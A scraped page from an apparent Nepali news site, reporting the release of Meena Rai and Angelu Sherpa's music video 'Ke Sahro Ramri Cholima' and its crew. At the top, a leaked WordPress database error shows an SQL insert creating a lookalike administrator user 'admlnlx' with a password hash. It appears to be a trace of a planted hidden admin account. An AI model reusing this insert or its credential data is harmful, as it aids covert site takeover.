WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9gVRaC4mItDfltYro.ZxNcb8U1caO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-27 09:18:54', '', 'admlnlx', 'admlnlx')
काठमाडौं । आङगेलु शेर्पा र मीना राईको स्वरमा ‘के साह्रो राम्री चोलीमा गीतको भिडियो डिजिटल बजारमा सार्वजनिक भएको छ । नयाँ वर्षको अवसरमा उक्त गीतको म्युजिक भिडियो सार्वजानिक भएको हो ।
मीना राईको शब्द संगीत रहेको ‘के साह्रो राम्री चोलीमा’लाई राजु कार्कीले एरेञ्ज गरेका हुन् । ‘मीना राई अफिसियल’ युटुब च्यानलबाट सार्वजानिक गरिएको हो ।
अनिल कोयीको निर्देशनमा तयार पारिएको ‘के साह्रो राम्री चोलीमा’ गीतको भिडियोमा केकी अधिकारी र उमेश राई फुलन्देको आमाले अभिनय गरेका छन् । उक्त म्युजिक भिडियोमा दिनेश पराजुलीको छायाङ्कन, सुरेन्द्र बसेलको कोरियोग्राफी र अमृत चापागाईंको सम्पादन रहेको छ ।